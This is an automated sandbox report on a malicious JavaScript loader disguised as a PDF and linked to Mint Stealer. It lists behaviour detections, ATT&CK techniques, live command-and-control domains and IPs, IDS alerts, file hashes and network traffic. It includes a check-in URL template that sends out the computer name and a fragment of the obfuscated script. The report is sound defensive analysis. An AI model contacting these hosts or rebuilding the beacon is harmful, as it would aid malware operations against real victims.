    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information

    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1796, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1796, type: MEMORYSTR
    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | 2 Scripting | Valid Accounts | 31 Windows Management Instrumentation | 2 Scripting | 11 Process Injection | 11 Virtualization/Sandbox Evasion | OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
    Credentials | Domains | Default Accounts | 11 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | 11 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 13 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact

    Source | Detection | Scanner | Label | Link
    _DRP12938938231_PDF.js | 16% | ReversingLabs | Script-JS.Trojan.MalDorado
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    https://0.google | 0% | Avira URL Cloud | safe
    http://pesterbdd.com/images/Pester.png | 0% | Avira URL Cloud | safe
    http://www.microsoft.w | 0% | Avira URL Cloud | safe
    http://sfibhzu3ubhza.top/1.php?s=mints218 | 0% | Avira URL Cloud | safe
    https://0.google.com/ | 0% | Avira URL Cloud | safe
    http://$g31r4qoblma59n7/$ka2f95t10y7xcsp.php?id=$env:computername&key=$fdnjboswy&s=mints21 | 0% | Avira URL Cloud | safe
    http://sfibhzu3ubhza.top/1.php?s=mints21 | 0% | Avira URL Cloud | safe
    http://sfibhzu3ubhza.top | 0% | Avira URL Cloud | safe
    https://apis.google.comh | 0% | Avira URL Cloud | safe
    https://ocsp.quovadisoffshore.com0 | 0% | Avira URL Cloud | safe
    http://0.google.com/ | 0% | Avira URL Cloud | safe
    https://ion=v4.5 | 0% | Avira URL Cloud | safe
    http://www.quovadis.bm0 | 0% | Avira URL Cloud | safe
    http://0.google. | 0% | Avira URL Cloud | safe
    http://gidcldeaccadneh.top | 100% | Avira URL Cloud | malware
    http://pesterbdd.com/images/Pester.pngXz | 0% | Avira URL Cloud | safe
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    sfibhzu3ubhza.top | 206.188.196.25 | true | true | | unknown
    www.google.com | 74.125.136.106 | true | false | | high
    gidcldeaccadneh.top | 206.188.196.37 | true | true | | unknown
    Name | Malicious | Antivirus Detection | Reputation
    http://sfibhzu3ubhza.top/1.php?s=mints21 | true | Avira URL Cloud: safe | unknown
    http://www.google.com/ | false | | high
    Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                            high
                                                                                            http://www.quovadis.bm0powershell.exe, 00000003.00000002.79917995342.0000016D427F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://gidcldeaccadneh.toppowershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              https://aka.ms/pscore68powershell.exe, 00000003.00000002.79881311037.0000016D2A4B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000003.00000002.79881311037.0000016D2A6D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
206.188.196.25 | sfibhzu3ubhza.top | United States | 55002 | DEFENSE-NETUS | true
206.188.196.37 | gidcldeaccadneh.top | United States | 55002 | DEFENSE-NETUS | true
74.125.136.106 | www.google.com | United States | 15169 | GOOGLEUS | false
                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1556633
                                                                                                Start date and time:2024-11-15 18:21:38 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 5m 52s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                                                                                Run name:Suspected VM Detection
Number of new started processes analysed:5
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:_DRP12938938231_PDF.js
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.expl.evad.winJS@4/5@3/3
                                                                                                EGA Information:Failed
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                • Number of executed functions: 21
                                                                                                • Number of non-executed functions: 9
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .js
                                                                                                • Stop behavior analysis, all processes terminated
                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 1796 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                • VT rate limit hit for: _DRP12938938231_PDF.js
Time | Type | Description
12:23:46 | API Interceptor | 42x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
206.188.196.25 | 82tI00QdFy.ps1 | malicious | Unknown | gibuzuy37v2v.top/1.php?s=mints13
206.188.196.25 | peXF7I6W.ps1 | malicious | Unknown | gibuzuy37v2v.top/1.php?s=mints13
206.188.196.25 | Fattura88674084.vbs | malicious | Unknown | gibuzuy37v2v.top/1.php?s=mints13
206.188.196.25 | Fattura88674084.vbs | malicious | Unknown | gibuzuy37v2v.top/1.php?s=mints13
206.188.196.37 | ryOpDCeOHz.ps1 | malicious | Unknown | gidcldeaccadneh.top/hqr7nx0sg1htr.php?id=computer&key=50024904669&s=mints13
206.188.196.37 | ryOpDCeOHz.ps1 | malicious | Unknown | gidcldeaccadneh.top/kdv0uaf47hhtr.php?id=user-PC&key=111095586772&s=mints13
206.188.196.37 | Fdoze89ykv.js | malicious | Mint Stealer | gidcldeaccadneh.top/d3q2k547nrhtr.php?id=computer&key=49178848774&s=mints21
206.188.196.37 | Fdoze89ykv.js | malicious | Mint Stealer | gidcldeaccadneh.top/xuceh2n0lohtr.php?id=user-PC&key=57894837609&s=mints21
206.188.196.37 | Fattura05736577.vbs | malicious | Unknown | gidcldeaccadneh.top/06c2d9sea1htr.php?id=computer&key=21152678751&s=mints13
206.188.196.37 | tibhzuygfuyz.ps1 | malicious | Unknown | gidcldeaccadneh.top/276lca0oqkhtr.php?id=computer&key=55933565450&s=mints13
206.188.196.37 | tibhzuygfuyz.ps1 | malicious | Unknown | gidcldeaccadneh.top/9mtlfardohhtr.php?id=user-PC&key=89774062466&s=mints13
206.188.196.37 | Fattura05736577.vbs | malicious | Unknown | gidcldeaccadneh.top/5nyvigqht1htr.php?id=user-PC&key=79290330744&s=mints13
206.188.196.37 | Fattura41579790.vbs | malicious | Unknown | gidcldeaccadneh.top/fpmerz30vyhtr.php?id=computer&key=44154737485&s=mints13
Match | Associated Sample Name / URL | Detection | Threat Name | Context
gidcldeaccadneh.top | ryOpDCeOHz.ps1 | malicious | Unknown | 206.188.196.37
gidcldeaccadneh.top | ryOpDCeOHz.ps1 | malicious | Unknown | 206.188.196.37
gidcldeaccadneh.top | Fdoze89ykv.js | malicious | Mint Stealer | 206.188.196.37
gidcldeaccadneh.top | Fdoze89ykv.js | malicious | Mint Stealer | 206.188.196.37
gidcldeaccadneh.top | Fattura05736577.vbs | malicious | Unknown | 206.188.196.37
gidcldeaccadneh.top | tibhzuygfuyz.ps1 | malicious | Unknown | 206.188.196.37
gidcldeaccadneh.top | tibhzuygfuyz.ps1 | malicious | Unknown | 206.188.196.37
gidcldeaccadneh.top | Fattura05736577.vbs | malicious | Unknown | 206.188.196.37
gidcldeaccadneh.top | Fattura41579790.vbs | malicious | Unknown | 206.188.196.37
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DEFENSE-NETUS | ryOpDCeOHz.ps1 | malicious | Unknown | 206.188.196.37
DEFENSE-NETUS | ryOpDCeOHz.ps1 | malicious | Unknown | 206.188.196.37
DEFENSE-NETUS | Fdoze89ykv.js | malicious | Mint Stealer | 206.188.196.37
DEFENSE-NETUS | Fdoze89ykv.js | malicious | Mint Stealer | 206.188.196.37
DEFENSE-NETUS | Fattura05736577.vbs | malicious | Unknown | 206.188.196.37
DEFENSE-NETUS | tibhzuygfuyz.ps1 | malicious | Unknown | 206.188.196.37
DEFENSE-NETUS | tibhzuygfuyz.ps1 | malicious | Unknown | 206.188.196.37
DEFENSE-NETUS | Fattura05736577.vbs | malicious | Unknown | 206.188.196.37
DEFENSE-NETUS | Fattura41579790.vbs | malicious | Unknown | 206.188.196.37
                                                                                                No context
                                                                                                No context
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:@...e...........................................................
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                File type:ASCII text, with very long lines (1153)
                                                                                                Entropy (8bit):5.2574100513146345
                                                                                                TrID:
                                                                                                  File name:_DRP12938938231_PDF.js
                                                                                                  File size:12'898 bytes
                                                                                                  MD5:b05ee915cdbdb359f19b8e42acebaf48
                                                                                                  SHA1:f8a4866dd81dde78f6f1a1e11a9594fcbce71612
                                                                                                  SHA256:41facb3e96a81c04259c40c2170e6dc53047838e0f918dba889fc6510bc4374d
                                                                                                  SHA512:59abbd040beb90ff17317e51a700344c157fae47d80872609272e3b1b5354b4b2261d61addaa920336fde068b9d43efe270e1da04a1b400e7cc9b5261556976d
                                                                                                  SSDEEP:192:Jxw9SBFDvaPs2cj0ocV3/YBM7fEo03oTxqeDnzaZ8G9+FTTIgSN8U0U5E06JUDld:Jd33MjzWZ9+FXIxRp6Jc3ruM
                                                                                                  TLSH:514297287BAF65017D172E8D273FC010EA2060331586E938765EF690AF6D619D7DCEB8
                                                                                                  File Content Preview:var whichburton0wallsand = whichburton0theirreign;.var whichburton0thispopular = whichburton0theirreign;.function whichburton0theirreign(intohave, theirreign) {. var wallsand = whichburton0intohave();. whichburton0theirreign = function (thispopular,
                                                                                                  Icon Hash:68d69b8bb6aa9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-15T18:23:48.092606+0100 | 2057063 | ET MALWARE Mints.Loader CnC Activity (GET) | 1 | 192.168.11.20 | 49763 | 206.188.196.25 | 80 | TCP
2024-11-15T18:23:48.092606+0100 | 2858291 | ETPRO MALWARE TA582 CnC Checkin | 1 | 192.168.11.20 | 49763 | 206.188.196.25 | 80 | TCP
2024-11-15T18:23:50.224181+0100 | 2859003 | ETPRO MALWARE TA582 Domain in DNS Lookup | 1 | 192.168.11.20 | 56619 | 1.1.1.1 | 53 | UDP
2024-11-15T18:23:51.210209+0100 | 2856654 | ETPRO MALWARE TA582 CnC Checkin | 1 | 192.168.11.20 | 49764 | 206.188.196.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 15, 2024 18:23:47.324651003 CET | 49763 | 80 | 192.168.11.20 | 206.188.196.25
Nov 15, 2024 18:23:47.536147118 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:47.536319017 CET | 49763 | 80 | 192.168.11.20 | 206.188.196.25
Nov 15, 2024 18:23:47.539793968 CET | 49763 | 80 | 192.168.11.20 | 206.188.196.25
Nov 15, 2024 18:23:47.751228094 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.092417955 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.092439890 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.092454910 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.092600107 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.092606068 CET | 49763 | 80 | 192.168.11.20 | 206.188.196.25
Nov 15, 2024 18:23:48.092628002 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.092643023 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.092914104 CET | 49763 | 80 | 192.168.11.20 | 206.188.196.25
Nov 15, 2024 18:23:48.092963934 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.093003035 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.093018055 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.093030930 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.093245983 CET | 49763 | 80 | 192.168.11.20 | 206.188.196.25
Nov 15, 2024 18:23:48.304362059 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.304380894 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.304395914 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.304423094 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.304542065 CET | 49763 | 80 | 192.168.11.20 | 206.188.196.25
Nov 15, 2024 18:23:48.304675102 CET | 49763 | 80 | 192.168.11.20 | 206.188.196.25
Nov 15, 2024 18:23:48.304717064 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.304733992 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.304744959 CET | 80 | 49763 | 206.188.196.25 | 192.168.11.20
Nov 15, 2024 18:23:48.305061102 CET | 49763 | 80 | 192.168.11.20 | 206.188.196.25
Nov 15, 2024 18:23:50.406198978 CET | 49764 | 80 | 192.168.11.20 | 206.188.196.37
Nov 15, 2024 18:23:50.621330976 CET | 80 | 49764 | 206.188.196.37 | 192.168.11.20
Nov 15, 2024 18:23:50.621634960 CET | 49764 | 80 | 192.168.11.20 | 206.188.196.37
Nov 15, 2024 18:23:50.621809959 CET | 49764 | 80 | 192.168.11.20 | 206.188.196.37
Nov 15, 2024 18:23:50.836781025 CET | 80 | 49764 | 206.188.196.37 | 192.168.11.20
Nov 15, 2024 18:23:51.155949116 CET | 80 | 49764 | 206.188.196.37 | 192.168.11.20
Nov 15, 2024 18:23:51.210208893 CET | 49764 | 80 | 192.168.11.20 | 206.188.196.37
Nov 15, 2024 18:23:51.278289080 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.396305084 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.396569967 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.396631002 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.514487028 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.569926023 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.569962978 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.569989920 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.570015907 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.570044041 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.570069075 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.570094109 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.570103884 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.570138931 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.570254087 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.570327044 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.570440054 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.570444107 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.570652008 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.688074112 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.688088894 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.688380957 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.692334890 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.692348003 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.692591906 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.700983047 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.700995922 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.701184034 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.709561110 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.709574938 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.709813118 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.718167067 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.718271971 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.718458891 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.726759911 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.726773977 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.727081060 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.735405922 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.735420942 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.735759020 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.744019985 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.744034052 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.744307041 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.752785921 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.752815962 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.753038883 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.761256933 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.761303902 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.761625051 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.806279898 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.806309938 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.806581020 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.810542107 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.810595036 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.810859919 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.819329023 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.819346905 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.819633961 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.826555014 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.826662064 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.826926947 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.833997011 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.834036112 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.834265947 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.841367960 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.841487885 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.841720104 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.848841906 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.848855972 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.849149942 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.856281042 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.856293917 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.856523991 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:51.863729000 CET | 80 | 49765 | 74.125.136.106 | 192.168.11.20
Nov 15, 2024 18:23:51.913218021 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Nov 15, 2024 18:23:52.010395050 CET | 49764 | 80 | 192.168.11.20 | 206.188.196.37
